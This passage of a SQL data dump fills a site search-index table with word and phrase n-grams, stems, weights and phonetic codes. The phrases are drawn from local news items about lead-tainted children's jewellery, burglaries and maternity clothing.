jewelry',0,1,1.7667,'M624365246',1,'en'),(45052,'most teething','most teething',0,1,1.4333,'M2352',1,'en'),(45053,'most teething toys','most teething toys',0,1,1.6,'M235232',1,'en'),(45054,'much more','much more',0,1,1.3,'M256',1,'en'),(45055,'much more 600','much more 600',0,1,1.4333,'M256',1,'en'),(45056,'national 22','nation 22',0,1,1.3667,'N354',1,'en'),(45057,'national 22 2013','nation 22 2013',0,1,1.5333,'N354',1,'en'),(45058,'neck mom','neck mom',0,1,1.2667,'N250',1,'en'),(45059,'neck mom jewelry\'s','neck mom jewelry',0,1,1.6,'N252462',1,'en'),(45060,'necklace','necklac',0,0,0.5333,'N242',1,'en'),(45061,'necklace around','necklac around',0,1,1.5,'N242653',1,'en'),(45062,'necklace around your','necklac around your',0,1,1.6667,'N2426536',1,'en'),(45063,'neighbor','neighbor',0,0,0.5333,'N216',1,'en'),(45064,'neighbor then','neighbor then',0,1,1.4333,'N21635',1,'en'),(45065,'neighbor then used','neighbor then used',0,1,1.6,'N2163523',1,'en'),(45066,'neon','neon',0,0,0.2667,'N000',1,'en'),(45067,'neon leaf','neon leaf',0,1,1.3,'N410',1,'en'),(45068,'neon leaf anklet','neon leaf anklet',0,1,1.5333,'N415243',1,'en'),(45069,'neon process','neon process',0,1,1.4,'N162',1,'en'),(45070,'neon process anklet','neon process anklet',0,1,1.6333,'N1625243',1,'en'),(45071,'no.49','no.49',0,0,0.3333,'N000',1,'en'),(45072,'no.49 and','no.49 and',0,1,1.3,'N300',1,'en'),(45073,'no.49 and was','no.49 and was',0,1,1.4333,'N320',1,'en'),(45074,'nosed','nose',0,0,0.3333,'N230',1,'en'),(45075,'nosed reindeer','nose reindeer',0,1,1.4667,'N236536',1,'en'),(45076,'nosed reindeer theme','nose reindeer theme',0,1,1.6667,'N23653635',1,'en'),(45077,'november.21.jewelry','november.21.jewelri',0,0,1,'N1516246',1,'en'),(45078,'november.21.jewelry articles','november.21.jewelri articles',0,1,1.9333,'N15162463242',1,'en'),(45079,'november.21.jewelry articles stolen','november.21.jewelri articles stolen',0,1,2,'N15162463242345',1,'en'),(45080,'november.22.gate','november.22.g',0,0,1,'N151623',1,'en'),(45081,'november.22.gate kicked','november.22.g kicked',0,1,1.7667,'N15162323',1,'en'),(45082,'november.22.gate kicked in','november.22.g kicked in',0,1,1.8667,'N151623235',1,'en'),(45083,'occasion it\'s','occas it',0,1,1.4333,'O2532',1,'en'),(45084,'occasion it\'s milagrofilms','occas it milagrofilms',0,1,1.8667,'O253254261452',1,'en'),(45085,'oct','oct',0,0,0.2,'O230',1,'en'),(45086,'oct 11','oct 11',0,1,1.2,'O230',1,'en'),(45087,'oct 11 andapril.14.safe','oct 11 andapril.14.safe',0,1,1.7667,'O235316421',1,'en'),(45088,'of ben','of ben',0,1,1.2,'O150',1,'en'),(45089,'of ben reubens','of ben reubens',0,1,1.4667,'O156152',1,'en'),(45090,'of high','of high',0,1,1.2333,'O120',1,'en'),(45091,'of high amount','of high amount',0,1,1.4667,'O1253',1,'en'),(45092,'of lead','of lead',0,1,1.2333,'O143',1,'en'),(45093,'of lead the','of lead the',0,1,1.3667,'O143',1,'en'),(45094,'of the neon','of the neon',0,1,1.3667,'O135',1,'en'),(45095,'of your current','of your current',0,1,1.5,'O162653',1,'en'),(45096,'off from safe','off from safe',0,1,1.4333,'O16521',1,'en'),(45097,'on liberty','on liberty',0,1,1.3333,'O54163',1,'en'),(45098,'on liberty heights','on liberty heights',0,1,1.6,'O54163232',1,'en'),(45099,'on this occasion','on this occasion',0,1,1.5333,'O5325',1,'en'),(45100,'only when','onli when',0,1,1.3,'O545',1,'en'),(45101,'only when there','onli when there',0,1,1.5,'O54536',1,'en'),(45102,'open and','open and',0,1,1.2667,'O153',1,'en'),(45103,'open and jewellery','open and jewellery',0,1,1.6,'O153246',1,'en'),(45104,'our policy','our policy',0,1,1.3333,'O6142',1,'en'),(45105,'our policy is','our policy is',0,1,1.4333,'O6142',1,'en'),(45106,'owings','ow',0,0,0.4,'O520',1,'en'),(45107,'owings generators','ow generators',0,1,1.5667,'O5256362',1,'en'),(45108,'owings generators derived','ow generators derived',0,1,1.8333,'O52563623613',1,'en'),(45109,'park inn','park inn',0,1,1.2667,'P625',1,'en'),(45110,'park inn entry','park inn entry',0,1,1.4667,'P62536',1,'en'),(45111,'park school','park school',0,1,1.3667,'P624',1,'en'),(45112,'park school masteral','park school masteral',0,1,1.6667,'P62452364',1,'en'),(45113,'parts per','part per',0,1,1.3,'P63216',1,'en'),(45114,'parts per million','part per million',0,1,1.5667,'P63216545',1,'en'),(45115,'party at','parti at',0,1,1.2667,'P630',1,'en'),(45116,'party at 4618','parti at 4618',0,1,1.4333,'P630',1,'en'),(45117,'pendants','pendant',0,0,0.5333,'P53532',1,'en'),(45118,'pendants and','pendant and',0,1,1.4,'P5353253',1,'en'),(45119,'pendants and bangles','pendant and bangles',0,1,1.6667,'P535325315242',1,'en'),(45120,'per million','per million',0,1,1.3667,'P6545',1,'en'),(45121,'per million in','per million in',0,1,1.4667,'P6545',1,'en'),(45122,'permitted this','permit this',0,1,1.4667,'P6532',1,'en'),(45123,'permitted this is','permit this is',0,1,1.5667,'P6532',1,'en'),(45124,'piano','piano',0,0,0.3333,'P500',1,'en'),(45125,'piano mentioned','piano mentioned',0,1,1.5,'P5353',1,'en'),(45126,'piano mentioned in','piano mentioned in',0,1,1.6,'P53535',1,'en'),(45127,'police','polic',0,0,0.4,'P420',1,'en'),(45128,'police reports','polic reports',0,1,1.4667,'P4261632',1,'en'),(45129,'police reports from','polic reports from',0,1,1.6333,'P4261632165',1,'en'),(45130,'policy is','polici is',0,1,1.3,'P420',1,'en'),(45131,'policy is to','polici is to',0,1,1.4,'P423',1,'en'),(45132,'possible april.18.cash','possibl april.18.cash',0,1,1.7333,'P2141642',1,'en'),(45133,'possible april.18.cash ripped','possibl april.18.cash ripped',0,1,1.9667,'P2141642613',1,'en'),(45134,'possible november.21.jewelry','possibl november.21.jewelry',0,1,1.9333,'P21451516246',1,'en'),(45135,'possible november.21.jewelry articles','possibl november.21.jewelry articles',0,1,2,'P214515162463242',1,'en'),(45136,'precinct','precinct',0,0,0.5333,'P62523',1,'en'),(45137,'precinct our','precinct our',0,1,1.4,'P625236',1,'en'),(45138,'precinct our policy','precinct our policy',0,1,1.6333,'P625236142',1,'en'),(45139,'presented thursday','present thursday',0,1,1.6,'P6253623',1,'en'),(45140,'presented thursday the','present thursday the',0,1,1.7333,'P6253623',1,'en'),(45141,'pretty','pretti',0,0,0.4,'P630',2,'en'),(45142,'pretty chewy','pretti chewy',0,1,1.4,'P632',1,'en'),(45143,'pretty chewy ring','pretti chewy ring',0,1,1.5667,'P632652',1,'en'),(45144,'pried','pri',0,0,0.3333,'P630',1,'en'),(45145,'pried open','pri open',0,1,1.3333,'P6315',1,'en'),(45146,'pried open and','pri open and',0,1,1.4667,'P63153',1,'en'),(45147,'probe','probe',0,0,0.3333,'P610',1,'en'),(45148,'probe forces','probe forces',0,1,1.4,'P6162',1,'en'),(45149,'probe forces http','probe forces http',0,1,1.5667,'P616231',1,'en'),(45150,'process anklet','process anklet',0,1,1.4667,'P625243',1,'en'),(45151,'process anklet chain','process anklet chain',0,1,1.6667,'P62524325',1,'en'),(45152,'product safety','product safety',0,1,1.4667,'P6323213',1,'en'),(45153,'product safety commission','product safety commission',0,1,1.8333,'P63232132525',1,'en'),(45154,'professional her','profession her',0,1,1.5333,'P612546',1,'en'),(45155,'professional her aunt','profession her aunt',0,1,1.7,'P61254653',1,'en'),(45156,'profile','profil',0,0,0.4667,'P614',1,'en'),(45157,'profile following','profil following',0,1,1.5667,'P6141452',1,'en'),(45158,'profile following tori','profil following tori',0,1,1.7333,'P614145236',1,'en'),(45159,'public college','public college',0,1,1.4667,'P4242',1,'en'),(45160,'public college no.49','public college no.49',0,1,1.6667,'P42425',1,'en'),(45161,'recall','recal',0,0,0.4,'R240',1,'en'),(45162,'recall march','recal march',0,1,1.4,'R24562',1,'en'),(45163,'recall march 12','recal march 12',0,1,1.5,'R24562',1,'en'),(45164,'recalling','recal',0,0,0.6,'R2452',1,'en'),(45165,'recalling more','recal more',0,1,1.4667,'R245256',1,'en'),(45166,'recalling more children\'s','recal more children',0,1,1.8333,'R245256243652',1,'en'),(45167,'red nosed','red nosed',0,1,1.3,'R3523',1,'en'),(45168,'red nosed reindeer','red nosed reindeer',0,1,1.6,'R35236536',1,'en'),(45169,'regulators','regul',0,0,0.6667,'R24362',1,'en'),(45170,'regulators are','regul are',0,1,1.4667,'R243626',1,'en'),(45171,'regulators are recalling','regul are recalling',0,1,1.8,'R2436262452',1,'en'),(45172,'reindeer','reindeer',0,0,0.5333,'R536',1,'en'),(45173,'reindeer theme','reindeer theme',0,1,1.4667,'R53635',1,'en'),(45174,'reindeer theme sold','reindeer theme sold',0,1,1.6333,'R53635243',1,'en'),(45175,'removing','remov',0,0,0.5333,'R5152',1,'en'),(45176,'removing back','remov back',0,1,1.4333,'R515212',1,'en'),(45177,'removing back door','remov back door',0,1,1.6,'R51521236',1,'en'),(45178,'reports from','report from',0,1,1.4,'R1632165',1,'en'),(45179,'reports from the','report from the',0,1,1.5333,'R16321653',1,'en'),(45180,'reubens','reuben',0,0,0.4667,'R152',1,'en'),(45181,'reubens in','reuben in',0,1,1.3333,'R1525',1,'en'),(45182,'reubens in baltimore','reuben in baltimore',0,1,1.6667,'R152514356',1,'en'),(45183,'reubens was','reuben was',0,1,1.3667,'R152',1,'en'),(45184,'reubens was a','reuben was a',0,1,1.4333,'R152',1,'en'),(45185,'reubens who','reuben who',0,1,1.3667,'R152',1,'en'),(45186,'reubens who held','reuben who held',0,1,1.5333,'R15243',1,'en'),(45187,'ring','ring',0,0,0.2667,'R520',1,'en'),(45188,'ring by','ring by',0,1,1.2333,'R521',1,'en'),(45189,'ring by abigail','ring by abigail',0,1,1.5,'R52124',1,'en'),(45190,'ripped off','rip off',0,1,1.3333,'R131',1,'en'),(45191,'ripped off from','rip off from',0,1,1.5,'R13165',1,'en'),(45192,'robert e','robert e',0,1,1.2667,'R163',1,'en'),(45193,'robert e lee','robert e lee',0,1,1.4,'R1634',1,'en'),(45194,'rudolph','rudolph',0,0,0.4667,'R341',1,'en'),(45195,'rudolph of','rudolph of',0,1,1.3333,'R341',1,'en'),(45196,'rudolph of your','rudolph of your',0,1,1.5,'R3416',1,'en'),(45197,'safe at','safe at',0,1,1.2333,'S130',1,'en'),(45198,'safe at park','safe at park',0,1,1.4,'S13162',1,'en'),(45199,'safety','safeti',0,0,0.4,'S130',1,'en'),(45200,'safety commission','safeti commission',0,1,1.5667,'S132525',1,'en'),(45201,'safety commission says','safeti commission says',0,1,1.7333,'S1325252',1,'en'),(45202,'safety commission to','safeti commission to',0,1,1.6667,'S1325253',1,'en'),(45203,'said lead','said lead',0,1,1.3,'S343',1,'en'),(45204,'said lead levels','said lead levels',0,1,1.5333,'S3434142',1,'en'),(45205,'same fda','same fda',0,1,1.2667,'S513',1,'en'),(45206,'same fda approved','same fda approved',0,1,1.5667,'S5131613',1,'en'),(45207,'says the items','sai the items',0,1,1.4667,'S352',1,'en'),(45208,'school masteral','school masteral',0,1,1.5,'S452364',1,'en'),(45209,'school masteral as','school masteral as',0,1,1.6,'S4523642',1,'en'),(45210,'second floor','second floor',0,1,1.4,'S53146',1,'en'),(45211,'second floor bedroom','second floor bedroom',0,1,1.6667,'S531461365',1,'en'),(45212,'selling','sell',0,0,0.4667,'S452',1,'en'),(45213,'selling children\'s','sell children',0,1,1.6,'S45243652',1,'en'),(45214,'selling children\'s bracelets','sell children bracelets',0,1,1.9333,'S45243652162432',1,'en'),(45215,'selling lead','sell lead',0,1,1.4,'S45243',1,'en'),(45216,'selling lead tainted','sell lead tainted',0,1,1.6667,'S4524353',1,'en'),(45217,'she arrived','she arrived',0,1,1.3667,'S613',1,'en'),(45218,'she arrived at','she arrived at',0,1,1.4667,'S613',1,'en'),(45219,'she was 74','she was 74',0,1,1.3333,'S000',1,'en'),(45220,'she was the','she was the',0,1,1.3667,'S300',1,'en'),(45221,'should immediately','should immediately',0,1,1.6,'S43534',1,'en'),(45222,'should immediately be','should immediately be',0,1,1.7,'S435341',1,'en'),(45223,'since the neon','sinc the neon',0,1,1.4667,'S5235',1,'en'),(45224,'sold at','sold at',0,1,1.2333,'S430',1,'en'),(45225,'sold at dollar','sold at dollar',0,1,1.4667,'S4346',1,'en'),(45226,'sold at jh','sold at jh',0,1,1.3333,'S432',1,'en'),(45227,'spelling\'s','spell',0,0,0.6667,'S1452',1,'en'),(45228,'spelling\'s a','spell a',0,1,1.4,'S1452',1,'en'),(45229,'spelling\'s a fan','spell a fan',0,1,1.5333,'S145215',1,'en'),(45230,'split','split',0,0,0.3333,'S143',1,'en'),(45231,'split cites','split cites',0,1,1.3667,'S143232',1,'en'),(45232,'split cites store','split cites store',0,1,1.5667,'S14323236',1,'en'),(45233,'stolen from','stolen from',0,1,1.3667,'S345165',1,'en'),(45234,'stolen from bedroom','stolen from bedroom',0,1,1.6333,'S3451651365',1,'en'),(45235,'stolen from neighbor','stolen from neighbor',0,1,1.6667,'S345165216',1,'en'),(45236,'stolen the','stolen the',0,1,1.3333,'S3453',1,'en'),(45237,'stolen the jewelry','stolen the jewelry',0,1,1.6,'S3453246',1,'en'),(45238,'store at','store at',0,1,1.2667,'S363',1,'en'),(45239,'store at 2401','store at 2401',0,1,1.4333,'S363',1,'en'),(45240,'store for','store for',0,1,1.3,'S3616',1,'en'),(45241,'store for selling','store for selling',0,1,1.5667,'S36162452',1,'en'),(45242,'store on','store on',0,1,1.2667,'S365',1,'en'),(45243,'store on liberty','store on liberty',0,1,1.5333,'S3654163',1,'en'),(45244,'stringed','string',0,0,0.5333,'S36523',1,'en'),(45245,'stringed since','string since',0,1,1.4667,'S36523252',1,'en'),(45246,'stringed since the','string since the',0,1,1.6,'S365232523',1,'en'),(45247,'sun don\'t','sun don',0,1,1.3,'S5353',1,'en'),(45248,'sun don\'t forget','sun don forget',0,1,1.5333,'S53531623',1,'en'),(45249,'sunshine','sunshin',0,0,0.5333,'S525',1,'en'),(45250,'sunshine trading','sunshin trading',0,1,1.5333,'S52536352',1,'en'),(45251,'sunshine trading co','sunshin trading co',0,1,1.6333,'S52536352',1,'en'),(45252,'supplies','suppli',0,0,0.5333,'S142',1,'en'),(45253,'supplies consumer','suppli consumer',0,1,1.5667,'S1425256',1,'en'),(45254,'supplies consumer product','suppli consumer product',0,1,1.8333,'S142525616323',1,'en'),(45255,'surgery','surgeri',0,0,0.4667,'S626',1,'en'),(45256,'surgery care','surgeri care',0,1,1.4,'S62626',1,'en'),(45257,'surgery care in','surgeri care in',0,1,1.5,'S626265',1,'en'),(45258,'system for selling','system for selling',0,1,1.6,'S35162452',1,'en'),(45259,'tainted','taint',0,0,0.4667,'T530',1,'en'),(45260,'tainted children\'s','taint children',0,1,1.6,'T53243652',1,'en'),(45261,'tainted children\'s jewelry','taint children jewelry',0,1,1.8667,'T5324365246',1,'en'),(45262,'taken away','taken away',0,1,1.3333,'T250',1,'en'),(45263,'taken away from','taken away from',0,1,1.5,'T25165',1,'en'),(45264,'taxicab','taxicab',0,0,0.4667,'T210',1,'en'),(45265,'taxicab co','taxicab co',0,1,1.3333,'T212',1,'en'),(45266,'taxicab co and','taxicab co and',0,1,1.4667,'T21253',1,'en'),(45267,'teething','teeth',0,0,0.5333,'T520',1,'en'),(45268,'teething bling','teeth bling',0,1,1.4667,'T521452',1,'en'),(45269,'teething bling the','teeth bling the',0,1,1.6,'T5214523',1,'en'),(45270,'teething toys','teeth toys',0,1,1.4333,'T5232',1,'en'),(45271,'teething toys the','teeth toys the',0,1,1.5667,'T52323',1,'en'),(45272,'that necklace','that necklace',0,1,1.4333,'T5242',1,'en'),(45273,'that necklace around','that necklace around',0,1,1.6667,'T5242653',1,'en'),(45274,'that the store','that the store',0,1,1.4667,'T236',1,'en'),(45275,'the agency','the agency',0,1,1.3333,'T252',1,'en'),(45276,'the agency presented','the agency presented',0,1,1.6667,'T25216253',1,'en'),(45277,'the agency said','the agency said',0,1,1.5,'T2523',1,'en'),(45278,'the amount permitted','the amount permitted',0,1,1.6667,'T531653',1,'en'),(45279,'the baltimore','the baltimore',0,1,1.4333,'T14356',1,'en'),(45280,'the baltimore based','the baltimore based',0,1,1.6333,'T14356123',1,'en'),(45281,'the baltimore city','the baltimore city',0,1,1.6,'T1435623',1,'en'),(45282,'the baltimore sun','the baltimore sun',0,1,1.5667,'T1435625',1,'en'),(45283,'the belle','the belle',0,1,1.3,'T140',1,'en'),(45284,'the belle isle','the belle isle',0,1,1.4667,'T1424',1,'en'),(45285,'the can','the can',0,1,1.2333,'T250',1,'en'),(45286,'the can chomp','the can chomp',0,1,1.4333,'T25251',1,'en'),(45287,'the city','the city',0,1,1.2667,'T230',1,'en'),(45288,'the city limit','the city limit',0,1,1.4667,'T23453',1,'en'),(45289,'the cockeysville','the cockeysville',0,1,1.5333,'T214',1,'en'),(45290,'the cockeysville precinct','the cockeysville precinct',0,1,1.8333,'T214162523',1,'en'),(45291,'the consumer','the consumer',0,1,1.4,'T25256',1,'en'),(45292,'the consumer product','the consumer product',0,1,1.6667,'T2525616323',1,'en'),(45293,'the health','the health',0,1,1.3333,'T430',1,'en'),(45294,'the health department','the health department',0,1,1.7,'T4316353',1,'en'),(45295,'the items','the items',0,1,1.3,'T520',1,'en'),(45296,'the items should','the items should',0,1,1.5333,'T5243',1,'en'),(45297,'the jewelry','the jewelry',0,1,1.3667,'T246',1,'en'),(45298,'the jewelry is','the jewelry is',0,1,1.4667,'T2462',1,'en'),(45299,'the little','the little',0,1,1.3333,'T434',1,'en'),(45300,'the little of','the little of',0,1,1.4333,'T4341',1,'en'),(45301,'the modern findings','the modern findings',0,1,1.6333,'T536515352',1,'en'),(45302,'the neon','the neon',0,1,1.2667,'T500',1,'en'),(45303,'the neon leaf','the neon leaf',0,1,1.4333,'T541',1,'en'),(45304,'the neon process','the neon process',0,1,1.5333,'T5162',1,'en'),(45305,'the robert','the robert',0,1,1.3333,'T6163',1,'en'),(45306,'the robert e','the robert e',0,1,1.4,'T6163',1,'en'),(45307,'the same fda','the same fda',0,1,1.4,'T2513',1,'en'),(45308,'the store','the store',0,1,1.3,'T236',1,'en'),(45309,'the store at','the store at',0,1,1.4,'T2363',1,'en'),(45310,'the third','the third',0,1,1.3,'T630',1,'en'),(45311,'the third time','the third time',0,1,1.4667,'T635',1,'en'),(45312,'the various colored','the various colored',0,1,1.6333,'T162463',1,'en'),(45313,'their dojo','their dojo',0,1,1.3333,'T632',1,'en'),(45314,'their dojo public','their dojo public',0,1,1.5667,'T632142',1,'en'),(45315,'thema','thema',0,0,0.3333,'T500',1,'en'),(45316,'thema reubens','thema reubens',0,1,1.4333,'T56152',1,'en'),(45317,'thema reubens in','thema reubens in',0,1,1.5333,'T561525',1,'en'),(45318,'theme sold','theme sold',0,1,1.3333,'T5243',1,'en'),(45319,'theme sold at','theme sold at',0,1,1.4333,'T5243',1,'en'),(45320,'then used','then used',0,1,1.3,'T523',1,'en'),(45321,'then used to','then used to',0,1,1.4,'T523',1,'en'),(45322,'there is enough','there is enough',0,1,1.5,'T6252',1,'en'),(45323,'they\'re pendants','thei pendants',0,1,1.5333,'T6153532',1,'en'),(45324,'they\'re pendants and','thei pendants and',0,1,1.6667,'T615353253',1,'en'),(45325,'they\'re with','thei with',0,1,1.4,'T630',1,'en'),(45326,'they\'re with little','thei with little',0,1,1.6333,'T63434',1,'en'),(45327,'third time in','third time in',0,1,1.4333,'T635',1,'en'),(45328,'this occasion','thi occasion',0,1,1.4333,'T250',1,'en'),(45329,'this occasion it\'s','thi occasion it',0,1,1.6,'T2532',1,'en'),(45330,'thrown','thrown',0,0,0.4,'T650',1,'en'),(45331,'thrown away.11','thrown away.11',0,1,1.4667,'T650',1,'en'),(45332,'thrown away.11 at','thrown away.11 at',0,1,1.5667,'T653',1,'en'),(45333,'thursday the','thursdai the',0,1,1.4,'T623',1,'en'),(45334,'thursday the agency','thursdai the agency',0,1,1.6333,'T623252',1,'en'),(45335,'time in','time in',0,1,1.2333,'T500',1,'en'),(45336,'time in many','time in many',0,1,1.4,'T500',1,'en'),(45337,'times the','time the',0,1,1.3,'T523',1,'en'),(45338,'times the amount','time the amount',0,1,1.5333,'T52353',1,'en'),(45339,'to get into','to get into',0,1,1.3667,'T2353',1,'en'),(45340,'to have lead','to have lead',0,1,1.4,'T143',1,'en'),(45341,'to include descriptions','to include descriptions',0,1,1.7667,'T5243261352',1,'en'),(45342,'to make individuality','to make individuality',0,1,1.7,'T52531343',1,'en'),(45343,'to the modern','to the modern',0,1,1.4333,'T5365',1,'en'),(45344,'together with','togeth with',0,1,1.4333,'T2363',1,'en'),(45345,'together with meredith','togeth with meredith',0,1,1.7333,'T2363563',1,'en'),(45346,'tori','tori',0,0,0.2667,'T600',1,'en'),(45347,'tori spelling\'s','tori spelling',0,1,1.5,'T621452',1,'en'),(45348,'tori spelling\'s a','tori spelling a',0,1,1.5667,'T621452',1,'en'),(45349,'towson','towson',0,0,0.4,'T250',1,'en'),(45350,'towson she','towson she',0,1,1.3333,'T252',1,'en'),(45351,'towson she was','towson she was',0,1,1.4667,'T252',1,'en'),(45352,'toxic','toxic',0,0,0.3333,'T200',1,'en'),(45353,'toxic metal','toxic metal',0,1,1.3667,'T2534',1,'en'),(45354,'toxic metal cadmium','toxic metal cadmium',0,1,1.6333,'T2534235',1,'en'),(45355,'toys','toi',0,0,0.2667,'T200',1,'en'),(45356,'toys the','toi the',0,1,1.2667,'T230',1,'en'),(45357,'toys the baltimore','toi the baltimore',0,1,1.6,'T2314356',1,'en'),(45358,'trading co','trade co',0,1,1.3333,'T6352',1,'en'),(45359,'trading co articles','trade co articles',0,1,1.6333,'T635263242',1,'en'),(45360,'type supplies','type supplies',0,1,1.4333,'T12142',1,'en'),(45361,'type supplies consumer','type supplies consumer',0,1,1.7333,'T121425256',1,'en'),(45362,'up for','up for',0,1,1.2,'U160',1,'en'),(45363,'up for grabs','up for grabs',0,1,1.4,'U162612',1,'en'),(45364,'used to get','us to get',0,1,1.3667,'U2323',1,'en'),(45365,'various colored','variou colored',0,1,1.5,'V62463',1,'en'),(45366,'various colored bangle','variou colored bangle',0,1,1.7333,'V624631524',1,'en'),(45367,'was 74','wa 74',0,1,1.2,'W200',1,'en'),(45368,'was 74 and','wa 74 and',0,1,1.3333,'W253',1,'en'),(45369,'was a 1957','wa a 1957',0,1,1.3333,'W200',1,'en'),(45370,'was a homemaker','wa a homemaker',0,1,1.5,'W2526',1,'en'),(45371,'was an insurance','wa an insurance',0,1,1.5333,'W252652',1,'en'),(45372,'was the little','wa the little',0,1,1.4667,'W23434',1,'en'),(45373,'watch that necklace','watch that necklace',0,1,1.6333,'W3235242',1,'en'),(45374,'were found','were found',0,1,1.3333,'W6153',1,'en'),(45375,'were found to','were found to',0,1,1.4333,'W6153',1,'en'),(45376,'when there','when there',0,1,1.3333,'W536',1,'en'),(45377,'when there is','when there is',0,1,1.4333,'W5362',1,'en'),(45378,'when you have','when you have',0,1,1.4333,'W510',1,'en'),(45379,'which alerted','which alerted',0,1,1.4333,'W2463',1,'en'),(45380,'which alerted the','which alerted the',0,1,1.5667,'W2463',1,'en'),(45381,'who held','who held',0,1,1.2667,'W430',1,'en'),(45382,'who held the','who held the',0,1,1.4,'W430',1,'en'),(45383,'who literally','who literally',0,1,1.4333,'W4364',1,'en'),(45384,'who literally piano','who literally piano',0,1,1.6333,'W436415',1,'en'),(45385,'with a rudolph','with a rudolph',0,1,1.4667,'W36341',1,'en'),(45386,'with excessive','with excessive',0,1,1.4667,'W321',1,'en'),(45387,'with excessive levels','with excessive levels',0,1,1.7,'W3214142',1,'en'),(45388,'with little','with little',0,1,1.3667,'W3434',1,'en'),(45389,'with little sunshine','with little sunshine',0,1,1.6667,'W34342525',1,'en'),(45390,'with meredith','with meredith',0,1,1.4333,'W3563',1,'en'),(45391,'with meredith cohn','with meredith cohn',0,1,1.6,'W356325',1,'en'),(45392,'with teething','with teething',0,1,1.4333,'W352',1,'en'),(45393,'with teething bling','with teething bling',0,1,1.6333,'W3521452',1,'en'),(45394,'with the health','with the health',0,1,1.5,'W343',1,'en'),(45395,'world store','world store',0,1,1.3667,'W643236',1,'en'),(45396,'world store on','world store on',0,1,1.4667,'W6432365',1,'en'),(45397,'www milagrofilms','www milagrofilms',0,1,1.5333,'W54261452',1,'en'),(45398,'www milagrofilms ca','www milagrofilms ca',0,1,1.6333,'W54261452',1,'en'),(45399,'years that','year that',0,1,1.3333,'Y623',1,'en'),(45400,'years that the','year that the',0,1,1.4667,'Y623',1,'en'),(45401,'young world','young world',0,1,1.3667,'Y52643',1,'en'),(45402,'young world store','young world store',0,1,1.5667,'Y52643236',1,'en'),(45403,'your arms','your arms',0,1,1.3,'Y652',1,'en'),(45404,'your arms but','your arms but',0,1,1.4333,'Y65213',1,'en'),(45405,'your current','your current',0,1,1.4,'Y62653',1,'en'),(45406,'your current red','your current red',0,1,1.5333,'Y6265363',1,'en'),(45407,'your neck mom','your neck mom',0,1,1.4333,'Y6525',1,'en'),(45905,'dresses and','dress and',0,1,1.3667,'D6253',1,'en'),(46416,'media and','media and',0,1,1.3,'M353',1,'en'),(46434,'miller','miller',0,0,0.4,'M460',1,'en'),(46467,'navy','navi',0,0,0.2667,'N100',1,'en'),(46552,'of people','of people',0,1,1.3,'O140',1,'en'),(46572,'on from','on from',0,1,1.2333,'O5165',1,'en'),(46691,'point','point',0,0,0.3333,'P530',2,'en'),(46934,'spring','spring',0,0,0.4,'S1652',1,'en'),(47013,'tennis','tenni',0,0,0.4,'T520',1,'en'),(47049,'the exact','the exact',0,1,1.3,'T230',1,'en'),(47204,'up to','up to',0,1,1.1667,'U130',1,'en'),(47265,'when the','when the',0,1,1.2667,'W530',1,'en'),(47313,'wore','wore',0,0,0.2667,'W600',1,'en'),(47358,'117','117',0,0,0.3,'',1,'en'),(47359,'2013 and','2013 and',0,1,1.2667,'A530',1,'en'),(47360,'2013 and dresses','2013 and dresses',0,1,1.5333,'A5362',1,'en'),(47361,'2013 and june','2013 and june',0,1,1.4333,'A5325',1,'en'),(47362,'2013 prnewswire','2013 prnewswire',0,1,1.5,'P6526',1,'en'),(47363,'2013 prnewswire it\'s','2013 prnewswire it',0,1,1.6667,'P652632',1,'en'),(47364,'35wks','35wk',0,0,0.3333,'W200',1,'en'),(47365,'35wks pregnant','35wk pregnant',0,1,1.4667,'W216253',1,'en'),(47366,'35wks pregnant when','35wk pregnant when',0,1,1.6333,'W2162535',1,'en'),(47367,'a big hole','a big hole',0,1,1.3333,'A124',1,'en'),(47368,'a business','a business',0,1,1.3333,'A1252',1,'en'),(47369,'a business background','a business background',0,1,1.7,'A125212653',1,'en'),(47370,'a dining','a dining',0,1,1.2667,'A352',1,'en'),(47371,'a dining club','a dining club',0,1,1.4333,'A35241',1,'en'),(47372,'a dress maternity','a dress maternity',0,1,1.5667,'A36253653',1,'en'),(47373,'a du','a du',0,1,1.1333,'A300',1,'en'),(47374,'a du chien','a du chien',0,1,1.3333,'A325',1,'en'),(47375,'a heck','a heck',0,1,1.2,'A200',1,'en'),(47376,'a heck of','a heck of',0,1,1.3,'A210',1,'en'),(47377,'a higher','a higher',0,1,1.2667,'A260',1,'en'),(47378,'a higher grade','a higher grade',0,1,1.4667,'A26263',1,'en'),(47379,'a little more','a little more',0,1,1.4333,'A43456',1,'en'),(47380,'a million','a million',0,1,1.3,'A545',1,'en'),(47381,'a million years','a million years',0,1,1.5,'A54562',1,'en'),(47382,'a modest','a modest',0,1,1.2667,'A5323',1,'en'),(47383,'a modest maternity','a modest maternity',0,1,1.6,'A532353653',1,'en'),(47384,'a morning','a morning',0,1,1.3,'A5652',1,'en'),(47385,'a morning trolley','a morning trolley',0,1,1.5667,'A5652364',1,'en'),(47386,'a niche','a niche',0,1,1.2333,'A520',1,'en'),(47387,'a niche market','a niche market',0,1,1.4667,'A525623',1,'en'),(47388,'a platform','a platform',0,1,1.3333,'A143165',1,'en'),(47389,'a platform to','a platform to',0,1,1.4333,'A1431653',1,'en'),(47390,'a real','a real',0,1,1.2,'A640',1,'en'),(47391,'a real record','a real record',0,1,1.4333,'A646263',1,'en'),(47392,'a role','a role',0,1,1.2,'A640',1,'en'),(47393,'a role model','a role model',0,1,1.4,'A64534',1,'en'),(47394,'a time trying','a time trying',0,1,1.4333,'A353652',1,'en'),(47395,'a very sparse','a very sparse',0,1,1.4333,'A162162',1,'en'),(47396,'a veteran','a veteran',0,1,1.3,'A1365',1,'en'),(47397,'a veteran who','a veteran who',0,1,1.4333,'A1365',1,'en'),(47398,'about pregnancy','about pregnancy',0,1,1.5,'A1316252',1,'en'),(47399,'about pregnancy now','about pregnancy now',0,1,1.6333,'A13162525',1,'en'),(47400,'absolutely do','absolut do',0,1,1.4333,'A124343',1,'en'),(47401,'absolutely do it','absolut do it',0,1,1.5333,'A124343',1,'en'),(47402,'accepted los','accept los',0,1,1.4,'A21342',1,'en'),(47403,'accepted los angeles','accept los angeles',0,1,1.6667,'A213425242',1,'en'),(47404,'accomplishment','accomplish',0,0,0.9333,'A2514253',1,'en'),(47405,'accomplishment and','accomplish and',0,1,1.6,'A251425353',1,'en'),(47406,'accomplishment and isn\'t','accomplish and isn',0,1,1.8,'A251425353253',1,'en'),(47407,'act','act',0,0,0.2,'A230',1,'en'),(47408,'act as','act as',0,1,1.2,'A232',1,'en'),(47409,'act as a','act as a',0,1,1.2667,'A232',1,'en'),(47410,'add modest','add modest',0,1,1.3333,'A35323',1,'en'),(47411,'add modest on','add modest 